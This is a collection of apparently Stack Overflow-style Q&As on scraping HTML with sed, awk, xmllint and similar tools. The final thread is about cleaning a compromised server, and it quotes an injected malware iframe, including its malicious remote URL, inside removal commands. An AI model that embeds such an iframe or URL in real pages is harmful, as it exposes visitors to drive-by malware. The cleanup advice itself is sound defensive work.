Extract data from a webpage - web-scraping

I have about 10000 downloaded HTML files. They have a section of HTML code like this:
<tr>
<td width="10%" valign="top"><p>City:</p></td>
<td colspan="2"><p>
London
</p></td>
</tr>
What I need is a way of getting the cities from all the files. I'm using Linux, so I was thinking of using a shell script to do it with sed, but sed doesn't work well with these files because of encoding issues (some cities have accents, like Jérica, and it wouldn't find their names).
What's the proper way of doing it?

Well the most reliable way to do this would be to use an HTML (or XML) parser.
However, if the HTML is always formatted the same way, i.e. like this:
<tr>
<td width="10%" valign="top"><p>City:</p></td>
<td colspan="2"><p>
*******
</p></td>
</tr>
with the city name appearing where the asterisks are, then the following one-liner should work; it keeps just the city line from each match group and trims the surrounding whitespace:
grep -h -A2 '<p>City' *.html | grep -v -e '<td' -e '^--$' | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//'
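If you do go the parser route, here is a minimal sketch with xmllint (assumptions: the City: cell is always immediately followed by the value cell, as in the sample, and --recover copes with the files' HTML). Being a real parser, it should also respect the documents' encoding, so accented names like Jérica come through intact:
for f in *.html; do
  xmllint --html --recover --xpath '//td[p="City:"]/following-sibling::td[1]//p/text()' "$f" 2>/dev/null
done | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' | grep .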


Download web page and remove content except for one html table

I am regularly given a large HTML report from another department that requires a fair amount of manual work to edit into the required format.
I'd like to work a bit smarter. I can download the page via:
wget -qO- <https://the_page.html>
However, I just want to carve out the table that begins:
<!-- START Daily Keystroke
It goes on and on for many lines of html and always ends:
</table>
</div>
</div>
before the next load of data begins. I need everything between these patterns in one chunk of text or one file.
I played around with sed and awk, which I am not really familiar with, but it seems that without knowing how many lines will be in the file each time, these tools are not appropriate for this task. Something that can work on specific patterns seems more appropriate.
That being the case, I can potentially install other utilities. Does anyone have experience with something that might work?
I played around with sed and awk
Be warned that these tools are best suited for working with things that can be described by regular expressions, and HTML in general cannot be. HTML parsers are tools designed specifically for HTML documents. In general, you should avoid using regular expressions to deal with Chomsky type-2 (context-free) languages like HTML.
That being the case, I can potentially install other utilities. Does anyone have experience with something that might work?
I suggest trying hxselect, as it allows easy extraction of elements matching a CSS selector. It reads from stdin, so you can pipe output into it. Consider the following example: to download the www.example.com page and extract its title tag, I can do:
wget -q -O - https://www.example.com | hxselect -i 'title'
If you encounter ill-formed HTML, you can use hxclean, which will try to make it acceptable to hxselect, like so:
wget -q -O - https://www.example.com | hxclean | hxselect -i 'title'
If either of the above works with your URL, then you can start looking for a CSS selector that describes only the table you want to extract. See the CSS selectors reference for available features. I am unable to craft the selector without seeing the whole source of the page.
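For example, if the table happened to carry an identifying class (a hypothetical name here, since the real markup isn't shown), the extraction could look like:
wget -qO- <https://the_page.html> | hxclean | hxselect -i 'table.daily-keystroke'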
Another suggestion: gawk, cutting at the first multi-line record, followed by sed trimming the head up to the <!-- START Daily Keystroke marker:
gawk 'NR==1{print}' RS="</table>\n</div>\n</div>" input.html |sed '0,/<!-- START Daily Keystroke/d'
Or without intermediate file:
wget -qO- <https://the_page.html>| \
gawk 'NR==1{print}' RS="</table>\n</div>\n</div>" | \
sed '0,/<!-- START Daily Keystroke/d'
This script was tested against the sample text provided.
gawk Explanation:
The gawk script cuts the input text at the first occurrence of:
</table>
</div>
</div>
aligned to the left margin.
NR==1{print}
Prints gawk record number 1 only.
The first record consists of all the text (possibly many lines) up to the first match of the pattern in the RS variable.
RS="</table>\n</div>\n</div>"
A regular expression (RegExp) that matches the gawk multi-line record separator.
In case you want to allow for indenting whitespace, e.g.:
    </table>
    </div>
    </div>
include it in the RegExp:
RS="[[:space:]]*</table>[[:space:]]*\n[[:space:]]*</div>[[:space:]]*\n[[:space:]]*</div>"
sed Explanation:
Removes all lines up to and including the first line that matches the RegExp <!-- START Daily Keystroke.
0,/<!-- START Daily Keystroke/
The sed address range: from line 0 to the first line that matches <!-- START Daily Keystroke.
d
Deletes all lines in the range.
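For regular reuse, the whole pipeline fits in a small script. A minimal sketch; the placeholder URL is from the question and must be replaced with the real report address:
#!/bin/sh
# extract-table.sh -- sketch: fetch the report and keep only the
# Daily Keystroke table (placeholder URL, replace with the real one)
wget -qO- 'https://the_page.html' |
gawk 'NR==1{print}' RS='</table>\n</div>\n</div>' |
sed '0,/<!-- START Daily Keystroke/d' > table.html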

Scraping 5 characters off a webpage using sed or something better?

I have a downloaded webpage I would like to scrape using sed or awk. I have been told by a colleague that what I'm trying to achieve isn't possible with sed, and this is probably correct, seeing as he is a bit of a Linux guru.
What I am trying to achieve:
I am trying to scrape a locally stored HTML document for every value within this HTML label, which appears hundreds of times on the webpage.
For example:
<label class="css-l019s7">54321</label>
<label class="css-l019s7">55555</label>
This label class never changes, so it seems the perfect place to scrape the values from:
54321
55555
There are hundreds of occurrences of this data, and I need a list of them all.
As sed probably isn't capable of this, I would be forever grateful if someone could demonstrate AWK or something else?
Thank you.
Things I've tried:
sed -En 's#(^.*<label class=\"css-l019s7\">)(.*)(</label>.*$)#\2#gp' TS.html
The code above managed to extract about 40 of the 320 numbers, so there must be a small bug in this sed command for it to work only partially.
Use a parser like xmllint:
xmllint --html --recover --xpath '//label[@class="css-l019s7"]/text()' TS.html
As an interest in sed was expressed (note that html can use newlines instead of spaces, for example, so this is not very robust):
sed 't a
s/<label class="css-l019s7">\([^<]*\)/\
\1\
/;D
:a
P;D' TS.html
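Incidentally, the original attempt caught only some of the numbers because sed substitutes line by line, and the greedy ^.* collapses a line containing several labels into a single value. A grep -o variant prints one match per line and sidesteps that (a sketch, assuming the class attribute is always written exactly as shown):
grep -o '<label class="css-l019s7">[^<]*' TS.html | sed 's/.*>//'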
Using awk:
awk '$1~/^label class="css-l019s7"$/ { print $2 }' RS='<' FS='>' TS.html
or:
awk '$1~/^[\t\n\r ]*label[\t\n\r ]/ &&
$1~/[\t\n\r ]class[\t\n\r ]*=[\t\n\r ]*"css-l019s7"[\t\n\r ]*([\t\n\r ]|$)/ {
print $2
}' RS='<' FS='>' TS.html
someone could demonstrate AWK or something else?
This task seems to me best suited to a CSS selector. If you are allowed to install tools, you might use Element Finder in the following way:
elfinder -s "label.css-l019s7"
which will search for labels with the class css-l019s7 in the files in the current directory.
With grep you can get the values:
grep -Eo '([[:digit:]]{5})' file
54321
55555
With awk you can constrain where the values are; here, in the lines with label at the beginning or at the end:
awk '/^<label|\/label>$/ {if (match($0,/[[:digit:]]{5}/)) { pattern = substr($0,RSTART,RLENGTH); print pattern}}' file
54321
55555
Using GNU awk and gensub:
awk '/label class/ && /css-l019s7/ { str=gensub("(<label class=\"css-l019s7\">)(.*)(</label>)","\\2","g",$0); print str }' file
Search for lines containing "label class" and "css-l019s7". Capture the line in three groups, substitute the whole line with the second group, reading the result into the variable str, and print str.

using sed with echo and reading from a file

I want to use sed to delete the directory path, keeping only the file name, from an HTML file. The path looks like:
<a href="/dir1/dir2/file.mp3" other_tags_here </a>
with percent-encoded spaces (%20) and other characters in the directory and file names, e.g.
<a href="/1-%one%2026/two%20_three%four/1-%eight.mp3"
I just need to keep <a href="1-%eight.mp3" other_tags_here </a>. When I try
echo '<a href="/1-%one%2026/two%20_three%four/1-%eight.mp3' | sed 's|href="/.*/.*/|href="|g'
it works fine. However when I read from the html file
sed 's|href="/.*/.*/|href="|g' file.html
it deletes everything after href= and returns only href=. How do I correct this?
In sed, regexes match the leftmost, longest match. That means the final .*/ in your regex will match all the way to the final / on the line. To prevent that:
sed 's|href="/[^/]*/[^/]*/|href="|g' file.html
The regex [^/]*/ will only match up to the next /.
In languages like Python or Perl, we can address this issue by using non-greedy regexes. Because sed does not support non-greedy regexes, we have to achieve a similar effect using tricks like [^/]*/.
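For comparison, a non-greedy Perl sketch of the same substitution (assuming exactly two directory levels, as in the sed example):
perl -pe 's|href="/.*?/.*?/|href="|g' file.html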
Standard warning: in general, HTML can be very complex, with lots of special cases that regexes are ill-suited to handle.
When working with HTML, it is generally best to use HTML-specific tools (like Python's BeautifulSoup).

Xmlstarlet fails to preserve original formatting (windows)

I have an XML document that I'm editing with xmlstarlet, removing the surrounding c tags whenever a descendant tag contains matching text.
Sample xml file:
<a>
<b>
<c><d>RED</d></c>
<c><d>BLUE</d></c>
</b>
</a>
Using the xpath syntax:
//d[text()='RED']/ancestor::c[1]
I am able to delete the nearest c tag which has a d tag with text 'RED' with the xmlstarlet arguments:
xml ed -P -O --inplace --delete //d[text()='RED']/ancestor::c[1]
The problem is that the original formatting is not preserved, as the -P switch is supposed to ensure; the output file is missing newlines and looks something like:
<a> <b> <c><d>BLUE</d></c> </b></a>
Note that I've been using Notepad to check the formatting before and after the edit. Any suggestions for how to get xmlstarlet to preserve the original formatting would be appreciated.

Looking for script to delete iframe malware from linux server

I'm looking for a script to delete the following iframe malware from my linux server:
<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
It has infected hundreds of files on my server across different websites. I tried
grep -rl ishigo.sytes.net * | sed 's/ /\\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'
but it just outputs:
sed: -e expression #1, char 49: unknown option to `s'
Appreciate your help :)
Cheers
Dee
Escape the slashes in the URL in the sed regex, or use a different delimiter for the s command, so that the slashes in the URL do not terminate the expression early.
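For example, switching the s command delimiter to | keeps the slashes in the URL from terminating the expression:
grep -rl ishigo.sytes.net * | sed 's/ /\\ /g' | xargs sed -i 's|<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>||g'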
This should be a more generic solution. Effectively, what the malware does is look for the </body> tag and inject the iframe just before it. So you can look for an iframe immediately preceding </body> and replace the pair with just the </body> tag.
# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</iframe></body>" * | sed 's/ /\\ /g' | xargs sed -i 's/<iframe .*><\/iframe><\/body>/<\/body>/g'
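A more robust variant (a sketch, assuming GNU grep, xargs, and sed) passes NUL-separated file names and avoids the space-escaping step entirely:
grep -RlZ '</iframe></body>' . | xargs -0 sed -i 's/<iframe .*><\/iframe><\/body>/<\/body>/g'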
I found another question, on renaming the malware files, which is also useful: you can quickly take down all the compromised files by renaming their extensions with a .hacked suffix, then fix the hack and finally remove the .hacked suffix.
